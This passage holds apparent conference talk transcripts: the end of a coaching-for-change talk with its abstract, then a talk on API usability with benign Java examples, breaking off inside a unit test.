hours, until I got to the car rental place and I was given this car. And then my view changed to, cool, I get to drive this for seven hours. This is about enjoying the journey as well as the destination. This is about making the doing something more enjoyable.
Some of that's within our control, some of it isn't, perhaps more of it's within our control than we might think. This is an intrinsic motivator. My biggest challenge recently, any of you that have children, probably faced the same challenge, my kids don't like doing homework. This isn't a change, really. This is just something they don't really want to do. So how could I encourage, how could I coach my children to do their homework? The first thing I could do is I could, and I've done this, I've offered them an extrinsic motivator. I said, if you do your homework, you can have some sweets, or if you do your homework, you can have some TV time. A gasper's breath for the audience, there those of you who can't hear, big intake of, ooh, what are you doing there, Jeff? Really dangerous tactic, absolutely, you're absolutely right, really dangerous tactic. Because now, whenever there's something they don't want to do, they're expecting sweets, they're expecting TV time. Now my chances again is to do homework in the long term, really, really diminished. It's a short term tactic. Sometimes it can work, but often it's setting yourself up for a long term challenge. So let's take extrinsic motivators out of the way. I could talk to my six year old son about how if he does his homework, he'll do better at school. If he does better at school, he'll get into a good university. If he does get into a good university, he'll get a good degree, he'll get a good job, which means he'll get money, which means he can buy a nice house and go on holidays. I could give him an intrinsic goal to doing his homework, but that's not going to interest him. He's six, alright? He can't tie doing, reading his terrible book or doing his spellings or learning his two times table. He can't tie that to why we'll have a nice house. So intrinsic motivator, perhaps not so good either. Our biggest challenge, well, so the spellings thing, we created spelling challenges and games. We set up sort of fake TV shows for the spelling challenges. We get them story cubes for their story writing examples, little toys, little games that they can play. But the biggest one that we found recently, he just didn't like reading. Reading is really important, but he just didn't like it. He was being given some really, really dull, uninteresting books from school. And getting him to read anything at the end of the day was just painful. It was causing friction between us. We had to do it, but he didn't want to do it, and we were the bad guys that were making him do it. So what we stumbled across was these little Star Wars books. My son's mad on Star Wars. He's seen it a hundred times maybe each episode. And so these read-it-yourself Star Wars books, we bought him one of those. And what we found was for someone that didn't like reading, he was making excuses to stay up late so that he could read his book. He had it on the end of his bed, so the first thing he did when he woke up in the morning was he started reading. We're now supplying the school with books. It's a bit ridiculous, but it's an intrinsic motivator. He doesn't see it as homework anymore. He doesn't see it as a chore, he sees it as something he wants to do, and he's learning in the process. So how can we use that to summarize where we are? Praise and recognition. We can increase the benefit of making sure that we know what's in it for us. Reward is not a bad thing, an extrinsic motivator is not a bad thing. 
Doing something you don't want to do, and then rewarding yourself at the end of it, that's okay. And a sense of achievement along the way, that can be a good thing. Increase the probability of success by making sure that the change is unhurried. We're doing it at a sustainable pace. And reduce the cost of change by enjoying the journey. Make sure that we enjoy the process of change, as well as the result of change. Fourth need from Pringle. Responsibility. This is often, as Pringle would say, this is often, you see this in the concept of me do it, me do it. Children want to do something. Seven-year-olds want to be nine-year-olds. Nine-year-olds want to be 11-year-olds. They all want to be a little bit older than they currently are. And Pringle said there's nothing wrong with giving your opinions, and children certainly need a framework, some rules and explanation of why this framework is in place. But ultimately, you should model some good behavior and give them responsibility ahead of time, effectively. So how is this relevant? I've read my blog, my poor son is getting involved far too much in this talk. He's not old enough to realize yet, he won't be checking YouTube for a while. So this is okay. I'm not embarrassing dad yet. But he wanted to play, you know, daddy, I want to play football with you. So I can't play football at the moment. I've got some work to do. He said, what work have you got to do? So I've got to clear the garden. I hate clearing the garden, clearing up the leaves. He said, can I help? I said yes, absolutely. So now I had a helper, not a slave. I had a helper, someone who wanted to help me. And so he was saying, oh, can I use the spik, can I use the wheelbarrow, can I use the leap, can I use the rake? He reached all these tools that daddy used. He now had the opportunity to use this responsibility. And halfway through, I feel really embarrassed about this. But halfway through he said, daddy, you said you had work to do. This isn't work, it's fun. All right, this made me feel really bad, obviously, because if a six-year-old can enjoy it, why can't I enjoy it? But we do, this responsibility thing does wear off a little bit when we get older. It's really important. The fact that he enjoyed it made me enjoy it a little bit more. So there was some vicarious enjoyment of the journey along the way. I want to ask a few statements here, when I'm running out of time, around the locus of control. So I'm going to give you four statements, and in your head I just want you to work out what you think your answer to these statements is. The four possible answers you can have are strongly agree, in which case you have one point. You agree, not strongly, you get two points. Disagree, you get three points. Strongly disagree, you get four points. Okay, there's going to be four questions. Just keep a running score in your head. I'm not going to ask you what your score is. First statement, most of what happens in life is controlled by forces that we don't understand and are outside of our control. Okay, so if you strongly agree with that statement, give yourself one point. If you strongly disagree with that, you get four points. Okay, statement two. Success hinges on being in the right place at the right time. Strongly agree one point, strongly disagree four points. Keep a running total in your head. Success hinges on being in the right place at the right time. Statement three, whether I work hard or not, it won't affect how people assess my performance. 
Strongly agree with that one point, strongly disagree four points. Keep a running total. And the final statement, leaders are born and not made. Okay, strongly agree one point. If you have a very high score, okay, means you disagree with this statement, you have what is known as an internal locus of control. People with an internal locus of control look at a situation and think, okay, it might be difficult, but I can do something. I have control over my destiny to some degree. People with a low score here generally have what we call an external locus of control. They believe themselves to be relatively helpless. They believe themselves to be at the whim of fate and other people. People with a high external locus of control find change really, really daunting. Okay, they find it really difficult to cope with change. They find it very difficult to be proactive about change. So what I'm saying here is, could we as coaches find a way to help increase people's internal locus of control? Given the time, I'm going to have to just skip this next video. Developing an internal locus of control, taking ownership of our situation, taking control of our destiny, is a tool to increase the likelihood of change, and it's also a benefit to ourselves. We like being in control of our destiny, generally speaking. So what can we do about that? Well, again, a study, going back, this is not going back very long, it's only about five years ago, this study, someone I've already mentioned, Gildini. He studied people not turning up to doctor's appointments in the NHS in the UK. He found that by just changing one practice, you could reduce the number of people who didn't turn up by 18%. That one change was that the patient wrote down their appointment time, rather than the receptionist writing it down for them. So rather than the receptionist writing down, your appointment is on this time of the day, the patient wrote down, my appointment is on this day. It seems like a very simple change to make to have such a big impact, but it's very related to another study. I was unsure as to whether you guys actually have the same Halloween concept that we do in the UK, but apparently you do, we've exported it. So this idea of trick or treating, children coming round, knocking on the door, and you're giving them some sweets so they don't smash your car windows or something like that. There's a study done around Halloween, so they set up this house with a bowl of sweets outside, with a note that says, sorry we've gone out, but please take a sweet from the bowl. What do you think happened? Yeah, they took loads. Children just filled their pockets. Brilliant, no one's in. Loads of sweets, loads of chocolates. Off we go. Same setup, same house, same bowl, same sweets, same notes, sorry same note. One difference, behind the bowl was a mirror. Just a mirror. What happened then? They only took one. Why? Because they looked in the mirror and they didn't see, looking back at them, a thief. They didn't see themselves as a thief, and because they actually had to see themselves, they didn't steal. So how's this relevant? You as a coach can help be the mirror. By playing back what you see, by playing back what you hear, to them, holding it up to them, they can then assess their own behaviours, their own attitudes, their own responses. And by doing it in small chunks, just make some decision. Show to yourself that can have a positive impact on your own situation, and regularly make improvements in that regard. 
Get into the habit of increasing your internal locus of control, and regularly holding the mirror up as a coach. Filling up our matrix here: increase the benefit by helping people and encouraging people to take greater control of their destiny, internalising their locus of control; increase the probability by being the mirror. I'm not going to talk about non-directive language here, but basically it's about trying not to answer and solve their problems for them. So asking questions rather than answering questions as a coach. And then reduce the cost by increasing the sense of responsibility. So I want to wrap up. One more model I want to give you before we finish. And that is around the fact that change is hard. We know it's hard, we know it's scary. People will change if you can help get their change equation positive. It's got to be positive. Meeting those four needs that Pringle identified, or at least our analysed versions of them, will make it easier. Coaching can influence the change equation. So by taking a coaching approach, this non-directive approach, this supportive and nurturing approach, and then by having belief. So this is the final model that I want to leave you with, and this is effectively my default coaching approach as a coach. So, having BELIEF. Obviously it's an acronym, so the B stands for believing in the potential of the person you're coaching. Believing that anything is possible unless you've been proven otherwise. Taking advantage of the Pygmalion effect. E stands for enquiring. Enquire where they are, where they think they are, where they want to be, and why that would be valuable to them. Make sure they're aware of why it's valuable. So always asking, helping make sure they own this change. It's got to be valuable to them. Listen to what is being said, what's not being said, and how it's being said. And play it back to them. Illuminate what you're hearing, what you're seeing. Be the mirror. Encourage small - even if it's really, really small - experiments, changes, progress, forward motion. Get them into the habit of making a decision, seeing some results from it, building on it. And being there for them while they do that. And then helping to facilitate their - it sounds rather dramatic - facilitate their journey through this change process. Because it's going to be a long road, and you need to be adaptable. You need to be agile in your approach here. Some days you might just want to sit and let them rant, just let them get off their chest what's bothering them. Another day you might want to ask some really powerful questions. Or offer some observations, or offer some information, or perhaps play a little video and say, how's that relevant? So you need to be adaptable and have a flexible toolkit so that you can help people along their journey. So if you have belief in people, and you can use this model, you're more likely to help people help themselves. So that's my talk, I have three minutes left for questions. Anybody got a question? Questions? No? Fantastic. Me personally? Okay, so what situations have I used these techniques in? So I use these techniques in various ways. I'm a scrum coach, and I'm also a professional coach as well. So I coach people in the agile space, and I also coach people on things that have nothing to do with agile at all. So I'll be coaching teams adopting scrum. I'll be coaching scrum masters who are trying to become better at their job. I coach product owners trying to become better at their job. Coaching leaders trying to roll out agile within their organizations.
But also people who are looking to make a career change, who are looking to move jobs, who are looking to get a promotion. These kinds of things. As well as, at a personal level, coaching people in terms of their own lives outside of work, if you like. And to some degree coaching myself in my desire to not get considerably unfit and overweight. With moderate success. Okay, thank you. Any other questions? Thank you. The great well-known Australian philosopher Kylie Minogue once said, it's better the devil you know. So I'd rather stick with something that isn't brilliant, but I know it, than move to something that might be better, but might not be. I don't want to take that risk. Okay, yes? Sorry, again? Did you eat a second chocolate? I haven't yet. But there's always the chance, because I will need to walk down there again. So maybe you could be the mirror for me, if you see me reaching for a chocolate. Yeah. Okay. Well, thank you very much for turning out. And certainly thank you very much for joining in, asking some questions along the way. I hope it's been useful for you. Enjoy the rest of the conference.
|
Change is hard. Coaching for change is hard. How do you help generate some inertia for people to begin a change? Why do people sometimes choose to change and sometimes not? How can you increase the chances of people changing and how can you be an effective coach for people who want to change? And then, how do you know you are being effective as a coach? This session will introduce the concept of a "change equation" that I believe everyone weighs up when considering (even subconsciously) whether to make a change or not. I will then share my model of having BELIEF in your team, or the person you are coaching, to increase your chances of success and then finally a METRIC model for evaluating the effectiveness of coaching for change. This talk makes use of Mia Kellmer Pringle's book "The Needs of Children" which outlines 4 basic needs that children have and how, by applying these to my work as a coach it has increased my efficacy and thus the mobility of my clients.
|
10.5446/51420 (DOI)
|
Okay, can you hear me? It's like I don't have any answer, so I suppose nobody hears me. Okay. So, writing usable APIs in practice. Now I have to tell you that if you have Googled about this, there are some other versions of this talk I gave at other conferences; however, they are not identical. I always modify the material a bit, update stuff a bit, and generally speaking, I update it with the stuff that at that point in time annoys me the most. Okay. Basically, my talks are born out of frustration with what I see in my daily job. I work as a freelance consultant and contractor, and I write code. And I land on legacy code bases where some interesting decisions were taken. Okay. As far as APIs go, in this case, now we'll see it, but this talk is not only about APIs as in when you download, I don't know, the Spring API or Hibernate or something like this, but it's also about the stuff you do at work. In your internal project, if you actually are careful and disciplined in refactoring your code, you'll end up with plenty of packages or libraries or things that represent some sort of APIs, subsystems you use in the rest of the system. Okay. So the idea is that I'll talk about things that are relevant both for public APIs, if you publish APIs for third parties, and for the ones you use in your own internal projects. Okay. I want to start with a definition first. In this case, when I'm talking about APIs, I'm not talking about the Amazon APIs or stuff like this, but it's more like, and we'll be using this definition, any well-defined interface that defines the service that one component, module or application provides to other software elements. As a practical example, the Java IO package in Java 7 - this provides an API. Okay. I use it as an example because then I have a running example with this thing. So basically, all the interfaces, the classes, the exceptions are part of the API, the errors, but also, you don't see them here, the public methods, the stuff that the users of this package use, are part of the API in this context. Okay. By the way, if at any point in time you have questions, observations, and stuff like this, please raise your hand. And then let's talk about usability. So what is usability about in this context? It's about efficiency. Something is usable if it allows you to be productive in what you do. You want to do something without wasting time. It's about effectiveness. So we want to be able to actually solve the problem you are trying to solve in a proper way. It's about error prevention. A good software API, a well-written one, will help you to avoid some stupid mistakes. And this is also about ease of learning. How many of you have come across APIs where you can actually guess what method to call in which class, stuff like this, or the order of parameters? I've seen some - very, very few. But it's about this. The ease of learning is about the fact that you can navigate it in simple ways without too much effort. And then, since I've seen Uncle Bob with equations, and yesterday I saw Geoff Watts with his equations, I said, okay, I want my own equation in my talk now. I'm jealous. There it is. This is a usability equation. This is the big O notation. So it means that the upper bound for this is one over B - usability is O(1/B), if you like. I don't know exactly what kind of function it is, but that's an upper bound. And B is the brain power necessary to achieve your goals. Sorry, I thought I deleted this one. The equation is made up and totally arbitrary. I was just jealous, on my side, of the other guys.
But the serious message is that actually if you think as a rule of thumb that you don't want to overload the brain of people doing their work. Why do we want to bother with this ability anyway? Is from a company perspective actually, APIs can be quite a great asset, but also a huge liability. For example, I work a lot with investment banks. And typically I work on the big systems they use in the back end, pricing, risk in this kind of stuff. And they use the APIs written by the quant that are the mathematicians that come up with their own algorithms to calculate risk or price of an auction or some other things. And those APIs are actually company secret. To see them, to be allowed to see them as a developer, here to a special organization, most of the time. Because the algorithms are secret. So they are actually one of the main assets of the company. The problem is that usually there are also huge liabilities. Let's say, as Kevlin would say, the code is usually written in good ways. Is often written badly with memory leaks, is a mess, difficult to change, not tests. Many wonder why you have problems in the markets, but really sometimes some important functions have no automated tests whatsoever around those. And so when they want to implement new models or change something in the technology, they may have huge problems. So a project, for example, to go from, I work in a bank that was a project to go from Visual C++6 to, I think, Visual 2008, probably, took ages, can take years, simply because the code was written in horrible ways. Live alone, the visual C++6 is not really C++ in many ways, but it was mostly because of the way the things were written. But also there is the other perspective, it is how many of you here are programmers, write code every day, so most of them. Any managers, architects? Out. So from a programmer's perspective, having an API that is actually usable means that they have fewer bugs to take care of. Since, for example, I can guess how to use the classes and the methods and the data, it's easier for me to write code that makes sense. Of course, my code, as a consequence, will have higher quality, which will be so easy to maintain. And I'll be also more productive. It'll do what I'm supposed to do in less time. Really, a few days ago, I was working with a C API to do the tenet using some C++ code. I actually spent two days to understand how a particular bit of functionality worked to achieve my goals. Because of the patterns they followed, inviting it because of the documentation around it, but you see two days. So let's say that I didn't really feel very productive. So I had an impact, and I worked as a contractor, and I'm paid by the day, which means has an impact of my customers as well. And also, here I distinguish between two types of APIs, just as I mentioned before. So there are the public APIs, the ones that are given to third parties. You may work for a company that produces some libraries or packages to give outside, or the typical open source software that we download and the libraries we use. The private ones, in this case, are the ones for internal users. As I said before, if you refactor your application, modularize it properly, you'll end up with many several APIs to achieve different goals in the different parts of your application. As we see, there is one main difference between these two that is basically the private ones. You can do whatever you like with them. 
They are internal of your project, so if you make a mess, you will make a cause and mistake. You have a bad decision, you can always change it. With the public ones, you can't. Or, well, better, you can, but with great, great effort, because they are used by other people, other teams, and sometimes they even rely on your bugs. So in fact, I claim that any non-trivial software application involves writing one or more APIs. And also, I think that when we talk about good code, you know, as developers, what we mean in a way is also code that is usable from a developer's perspective. When you read a good fragment of code, it's like you think it's good because you know what you can do with it. You know how you can possibly modify it, you understand what it does. So it's usable from a programmer's perspective. Any questions so far? Okay. Now, I will introduce some concepts, usability concepts. The idea here is that I want to give you some information that you might not have come across, but I hope it will be useful for your work today, you know, to help you think in slightly different ways when you write some classes, packages, functions. After these, I'll talk also about some simple techniques you can use directly. You know, go back to work, you can do that. The simple techniques are chosen not because they are the only ones, it's just a small subset and these are things that are, as we see later, actually not difficult at all. Somehow we always forget about that stuff. All the code I see keeps having the same issues. So first concept, affordances. An affordance is a quality of an object or an environment that allows an individual to perform an action. A door affords opening and closing. This thing has a laser pointer, you can see it very well, but affords pointing. We can apply exactly the same concept to APIs. Let's think this is Java 4 reading a file line by line. Was kind of interesting. You can see that the affordance is there. You can read the file line by line. But also you can also see that sometimes the affordance is not that visible. It's not immediate. So if you had like media experience at that time of like, I need to do this, how do I do that? Then the first point of call is let's look at the class file. Nothing in there to help you. And then start to read all the classes and methods in the Java U and at some point you arrive at this thing. So the affordances there may not be that visible. The second point is that part of the affordances are also the errors. What can you do in case of errors? What does the API tell you? Something happens, what can you do about that? So the exceptions are part of their own affordances as well. And as you can see this example, there is plenty of stuff going on just to read the file line by line processing. This is an example with Java 7. They introduced a new package. Still doing the same thing. Here is a bit clearer in the code what you can do. Come out because there is a concept of file path. There is a concept of char set which you may or may not care about. Sometimes we just want to read the file line by line like this. And then there is something, this read all lines method. Still there are some things like files is a static class as a similar name to the other one but then I'll talk about this a bit more in that later on. And somebody that looked at one version of this talk on InfoQ actually criticized me for saying, well, the example with the file is not relevant. You should have used the Java class, Java Util Scanner. 
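For reference, minimal sketches of the styles being compared here - these are not the exact slides, and the file name, the class name and the process method are made up for illustration:

    import java.io.BufferedReader;
    import java.io.File;
    import java.io.FileReader;
    import java.io.IOException;
    import java.nio.charset.StandardCharsets;
    import java.nio.file.Files;
    import java.nio.file.Paths;
    import java.util.List;
    import java.util.Scanner;

    public class ReadLinesComparison {

        // Pre-Java-7 java.io style: File, FileReader and BufferedReader are all
        // in play just to get lines out of a file.
        static void oldIoStyle(String path) throws IOException {
            BufferedReader reader = new BufferedReader(new FileReader(new File(path)));
            try {
                String line;
                while ((line = reader.readLine()) != null) {
                    process(line);
                }
            } finally {
                reader.close();
            }
        }

        // Java 7 java.nio.file style: a single call, but it lives in a different
        // package (java.nio.file.Files) with a name confusingly close to java.io.File.
        static void nioStyle(String path) throws IOException {
            List<String> lines = Files.readAllLines(Paths.get(path), StandardCharsets.UTF_8);
            for (String line : lines) {
                process(line);
            }
        }

        // java.util.Scanner style: fewer lines at the call site, but the caller now
        // needs to know about two unrelated packages (java.io and java.util) for one job.
        static void scannerStyle(String path) throws IOException {
            Scanner scanner = new Scanner(new File(path));
            try {
                while (scanner.hasNextLine()) {
                    process(scanner.nextLine());
                }
            } finally {
                scanner.close();
            }
        }

        // Stand-in for whatever the caller actually does with each line.
        static void process(String line) {
            System.out.println(line);
        }

        public static void main(String[] args) throws IOException {
            oldIoStyle("data.txt");
            nioStyle("data.txt");
            scannerStyle("data.txt");
        }
    }

The point is not which snippet is shortest, but how many classes and packages a newcomer has to discover before the obvious task becomes obvious.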
Admittedly this code is cleaner than the first example. Fewer things going on. But if you have a few minutes of patience, I will explain why I don't think it's still a good API kind of thing. This is what you do in Python. Which I put this because what you do in Python or Ruby, this kind of languages is usually kind of obvious. This is why the duck typing languages have the property that usually somehow are written in a way that the obvious stuff you want to do the 80% of the time is just easy to find. And then there are some cognitive dimensions. By the way, I put at the end of the slides, I'll make them available. Somehow there are references, books and link references also. Here you see where I put the material as well in terms of things. So you can check the sources. So the first one is the abstraction level. Minimum and maximum levels of abstraction exposed by the API. Think about the file example. We see it again. The first example, there was the concept of file, but then there was the concept of reader and buffer reader and things that are actually at different level of abstraction in that context. Working framework. How much stuff have you got to know to be able to achieve your goal? How many classes, methods, packages, how many of these things are involved? Progressive evaluation. To what extent you can execute partially completed code? How many of you, when you try some new library, you want to achieve something, how many of you actually copy and paste some example code and then start tweaking it and maybe removing some and start to execute bit by bit and add more? How many of you do that? So an API that is amenable to this, that you can do that, allows you some progressive evaluation, basically helps you in understanding how it works. And penetrability, that is the extent to which you must understand the underlying implementation details. For example, things like sorting lists. For that one, it's very important to understand if the implementation is N log N or N square or whatever else. You can't see it from the surface, from reading the API. You have to understand, in a way, it's internal. Somebody has to tell you, but in a way, it's internal if you don't know. Or is it thread safe or not? Sometimes people don't tell you these things, but maybe you need to know that because the context in which you are using it, if it is not thread safe, you may have a problem. And then you don't know if it is thread safe and to be sure you have the log around it and then maybe you discover that it was thread safe and you have plenty of far too many logs and you start to have other kind of things. So how much you need to know about the details so you can be effective in using it. And then consistency, how much can you infer of the API once you know part of it? And here is the realm of naming conventions or the central decor patterns of your design of the API. It's the kind of the map of the system. How easy it is for people to actually understand it. Let's look at the examples again with the cognitive dimensions on the side so we have a reference point. So abstraction level, in this example, there is quite a lot of stuff going on because I want to read the file line by line. For me, the concept here is that I have a file and it has got lines. But here you have to know about file readers, buffered readers. And stuff like this. It's like there is more than abstraction level. There are many things, different levels you have to know to be effective with it. 
If I'm not clear, raise your hand and ask questions. Then think about the working framework. Again, you need to know about several classes and exceptions and things. Progressive evaluation, well, in a way it allows you to that because you can always create a reader and file reader and compose them one at a time and get there. So yeah, there is some. Penetrability, well, in this case, it's like you don't really need to know much of the internals. So it's okay. But at least it's all public stuff in this package. We are not thinking about any trading issues here or stuff like this. So kind of okay. Consistency, well, I'd say that Java is consistent in making your life difficult sometimes. So in a way, it's consistent to an extent. But let's look also here. This is an interesting point that will come up in a minute. So everything is in the same package. So I'm looking just at one of the Java IO API. I think, yeah. I need to just browsing that package. I'm able to do this. The example with Java 7. So this is a different one here. The abstraction level is actually much better because I've got the concept, well, of file and file system path and chart set that is, well, depending on what you read is probably interesting, even if probably most of the time you will end up with the default chart set anyway. So the abstraction level from this point of view is much better. Working framework, again, doesn't really require to know. A lot is fine. Progressive evaluation, you can do that. Penetrability, just like before. Consistency, again, same Java stuff. However, and also everything comes from the same package. So if you know about this package, you can browse it. But now I want to attract the rotation to one thing. This thing is in addition to the Java IO package. So basically now in Java 7, you have different ways of achieving the same goal using different subsystems, different APIs, which have things with similar names. I actually checked the files class. There's also some methods that are like the file class on the other one, except the file is not static. Files is mostly static methods. The other is not. So it's kind of, if you know about both, you may end up actually being confused. So living in the same system, these things actually may make your life not easier. And then the example with the scanner. The code is cleaner, I agree on that. And probably it's abstraction level. You have this concept of scanner. Scanner of what? What does a scanner scan? You can scan many things in many ways. What does it mean? And then if you look also, the scanner does basically scan stacks to give you some and chops it in various ways. But then also the scanner takes a file. So it's kind of odd. I don't think the abstraction level is quite much up. The code is cleaner. But look at this. It's two packages, two different ones. So you have to know about the Java.io file and the Java.util scanner. Live along the file that calling something utility is always a bit, you know, it's like the article. You don't know where to put stuff. You put it in utility. So the guy that criticized me on the web was like, you just said to use the scanner, your example is not relevant. Well, you know, the example was not about writing the code test. It was about talking the usability of the APIs here. So I maintain that even if the code here is cleaner, actually, it's not more usable. I would contend that actually using the first example is probably easier for you to find. 
Because you have to browse one place that is the obvious one, deals with files, yeah, and then you end up digging there. But it never comes to my mind. I say, ah, it's not here. Let's look at util. And then of course, the same example with the Python just to hear the abstraction level is exactly what you want, basically. You have a file, you have your lines, working framework requires one class and the red lines method on the class, which is pretty obvious. And progressive evaluation is pretty easy. Actually with Python, it's interesting. The first time I used it, I needed to solve a problem at work. So, but I didn't know the language at all. I got a Python in a nutshell book on the weekend, but basically ended up on the Monday having production ready code. But most of the code I wrote, I could kind of guess. You know, it's like, well, this class can be. And that was an interesting experiment because basically you can see that the APIs there are written in a way that address the 80% case. Yeah. Maybe they are not just as flexible and the Java, but I don't care. You know, most of the time you don't care about these things. Any questions so far? Okay. Now some techniques. As I said, these are techniques that are not new. It's nothing I've invented. It's nothing I've shatting or anything with this. But it's something that I see. I see again and again the same problems. Yeah. Basically, to actually improve our code, sometimes we just need a bit of attention and just apply very simple techniques that we all should know. Yeah. And I like this quote from Alan Perlis about this. You know, none of the ideas presented here are new. They are just forgotten from time to time. It just describes my feelings about these kind of things. So I talk about things like user perspective, naming, explicit context, error reporting, and also incremental design. For who in this room these things are completely unknowns, you cannot even guess what this stuff is. Yeah. So as you can see, it's nothing particularly new. But first thing, we developers are in the habit of doing our own stuff. Then somebody cannot use our code, our APIs, comes to us and we say, oh, how is it possible? Look, it's simple. You just do da, da, da, da, da, da, da, da. Yeah. It's obvious. The problem is that you really need to ask what would the user do? Yeah. And you are not the user. You are not the user. You are not the user. Okay. So you really need to do something to make sure that whatever you are doing makes sense to the user. First thing, these should be trivial. Yeah. Use language constructs to make intent clear. Make TV. If you read something like this on the code, you say, well, maybe you know that this code is about some TV-related stuff, television, that stuff. Yeah, it's creating a TV instance. What the hell is true and false? Yeah. I see code like this all the time. Then you go and dig into the implementation and you say, ah, it's color and then I guess it's color. The other one must be black and white and then it's safety or flat screen or something like this. Yeah. What if we had just an enum? As I say, this, how many of you have never seen code with a Boolean like this? How many of you always write code in ways similar to this? Okay. Well, I include the, you know, I'm just like you. It's not that I'm perfect. Just to be clear. And then you can end up with this. 
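Roughly, the before and after being described look something like this - a sketch only, since the real TV code is never shown, so the enum names are guesses at what the two booleans might mean:

    public class TVExample {

        // Hypothetical names: the slide only shows "make TV" with two booleans,
        // so these enums are guesses at what they might stand for.
        enum Colour { COLOUR, BLACK_AND_WHITE }
        enum Screen { FLAT, CRT }

        static class TV {
            final Colour colour;
            final Screen screen;
            TV(Colour colour, Screen screen) {
                this.colour = colour;
                this.screen = screen;
            }
        }

        // The style the slide complains about: what do true and false mean here?
        static TV makeTV(boolean colour, boolean flatScreen) {
            return new TV(colour ? Colour.COLOUR : Colour.BLACK_AND_WHITE,
                          flatScreen ? Screen.FLAT : Screen.CRT);
        }

        // The more usable version: the call site reads like the intent.
        static TV makeTV(Colour colour, Screen screen) {
            return new TV(colour, screen);
        }

        public static void main(String[] args) {
            TV unclear = makeTV(true, false);                 // guesswork for the reader
            TV clear   = makeTV(Colour.COLOUR, Screen.FLAT);  // self-explanatory
            System.out.println(unclear.colour + " / " + clear.screen);
        }
    }

The second call site documents itself, and the compiler rejects nonsense arguments instead of silently accepting a swapped pair of booleans.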
So basically, if the API for making a TV had exposed this kind of enum, the usability would also be much, much better, because for the person having to call it, it would be much easier to guess what to do. And also, reading the code, you now understand what it does. But sometimes when we develop our own stuff, we lose focus on this perspective because we are too engrossed in the ideas we have in our heads. Yeah. And we forget about these aspects because, after all, if we are doing it, we are the experts. Yeah. So the complexity doesn't feel too bad to us. And with the code I'm dealing with right now, it's even worse because I don't have Booleans. I don't have Booleans. I have ints, and #defines instead of constants, you know, to define the various ints, which is even worse, because a Boolean at least has two values, so it's like, OK. But an int has, you know, two to the thirty-two or so possible values - which ones are actually allowed and which are not? Yeah. Questions so far? The next one: give control to the caller. Now, who can answer this? What's wrong with this? Have a look at the code and tell me. By the way, this comes from real production code I've seen. OK. So I didn't make it up. So if you find it strange, it's not because I wanted to make a point. It just comes from real production code. Maybe somebody can tell me what's wrong with this. OK. Let's have a look. The first one is Startable. It has a method start that returns a Startable. But if you call start again, it will throw an exception saying, oh, it is already started. Sorry. Yeah. So if you, in your code, end up with a Startable, you can start it, but then it's like, you can't do much else with it. Then there is the Stopable one, which works on basically the same pattern. stop returns a Stopable. But if it is already stopped, you cannot stop it. So users of this API are actually forced - well, first of all, it's obvious that these things go together - so they are actually forced, if they get a Startable, to downcast it to a Stopable. So basically they have to know an implementation detail to be able to do something with their own active object. Yeah. Is it clear? You get a Startable somewhere, you start it, but at some point you need to stop it. You know that it has to be a Stopable, so you have to cast it to the Stopable thing. These kinds of things can make your code incredibly brittle, because then you change something, the casts don't work anymore, you have all sorts of problems. This had been written by someone with a very interesting idea about the single responsibility principle. After a while we refactored the whole thing to this, which was, you know, a Service that has a start, has a stop, and you know if it is started or not - there's a sketch of this below. But this kind of code actually happens again and again. I see this again and again, with variations on the theme. It's like you provide an API, but then to do something you have to downcast and have to know the implementation class underneath. You have the interface, but you have to know the implementation and downcast it to do something interesting to you. Who does TDD in this room? At least writes unit tests, even if not TDD? The same people. A few more. Now, if you actually write your API using TDD, it puts you in the shoes of a user. Because if you write the test first, think about what you don't want to have in your test.
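Going back to the Startable/Stopable story for a moment, the shape of the problem and of the refactored version is roughly this - the names follow the talk (including its spelling of Stopable), and the details are illustrative rather than the real production code:

    // The original pair: callers are handed a Startable...
    interface Startable {
        Startable start();   // throws if already started
    }

    // ...but shutting down lives on a different interface entirely.
    interface Stopable {
        Stopable stop();     // throws if already stopped
    }

    // Which forces callers to rely on an implementation detail:
    //     Startable s = lookupService();     // hypothetical lookup
    //     ((Stopable) s).stop();             // brittle downcast

    // The refactored version described in the talk: one abstraction, no casts.
    interface Service {
        void start();
        void stop();
        boolean isStarted();
    }

With the single Service abstraction the caller never needs to know which concrete class it is holding, so there is nothing to downcast and nothing to break when the implementation changes.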
It's like, I need to read the file line by line, but of course now let's start with a file reader, then a buffered reader, blah, blah, blah, blah, and at the end you have the file. If you use TDD, usually you tend to say, you know what, I want to have a file from which I can read lines. Because at that point in time you become the user, and it feels tedious to do it the long-winded way. And it also helps you because it helps you with outside-in development. Usually you look at what you are trying to achieve exactly from the user perspective first, not from the internals, not from the other side. If writing a test is painful, the design may be wrong. Now, this is an important thing, because I have worked with teams that used TDD and they couldn't read their tests. They were confused by their own tests. That was a very strong sign that something was wrong somewhere. And this is something that is very easy to spot, because as soon as you get confused, something is wrong. And that is actually a strong signal that maybe you should change something in your design. Not only this, the tests will provide up-to-date documentation and examples of use. How many of you, before using a new API, the very first thing you do is download the PDF manual and read about it? One. That's the first one. How many of you, instead, download snippets of code, copy, paste, try to compile and see what it does? If you use TDD, and you provide the tests to the user as well, this provides the examples of use. The snippets of code to get them started. And of course, TDD helps with the various things: the abstraction level. As I said, it helps you to limit the number of abstractions in the mainline scenario, simply because you're writing the test first, you probably are lazy, just like I am, and you don't want to write a load of stuff just to get to the main point. The tendency is to get to the main point first and then work around it. It helps keep the working framework smaller, pretty much for the same reason. You don't want to instantiate a zillion classes or dependencies first. And in fact, if you have to instantiate 50 mocks before actually being able to test your class, your design might be slightly wrong. It helps with the progressive evaluation as well, because the tests themselves are written in a progressive way. So somehow, naturally, your code follows the same kind of pattern. It provides examples of how the components interact with each other, so it helps with the penetrability as well. And consistency: if you are doing TDD properly, you refactor. I don't know how many of you were at the talk this morning about TDD, where did it all go wrong - the refactoring bit is always the bit that everybody seems to forget. Well, he mentioned that. And this will help you to actually maintain that consistency as well, because if you refactor, you'll end up actually taking care of these things. So if you think about the first example, reading a file: probably, if reading lines had been considered an important function there in Java and had been developed with TDD - this is a hypothesis - a potential test would have been something like this. You get some expected lines, you instantiate the file read lines, and check that they are exactly what you expect. So probably you would end up with code more similar to that. I'm pretty sure you wouldn't end up with the first thing. Yeah? Anybody thinking that I'm talking rubbish here? Questions?
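A guess at what that "potential test" might look like, written with JUnit 4. FileReadLines is hypothetical - it is the API you would wish for while writing the test, not a class that exists in the JDK - and the test data file name is made up:

    import static org.junit.Assert.assertEquals;

    import java.io.IOException;
    import java.nio.charset.StandardCharsets;
    import java.nio.file.Files;
    import java.nio.file.Paths;
    import java.util.Arrays;
    import java.util.List;
    import org.junit.Test;

    public class FileReadLinesTest {

        @Test
        public void readsAllLinesInOrder() throws Exception {
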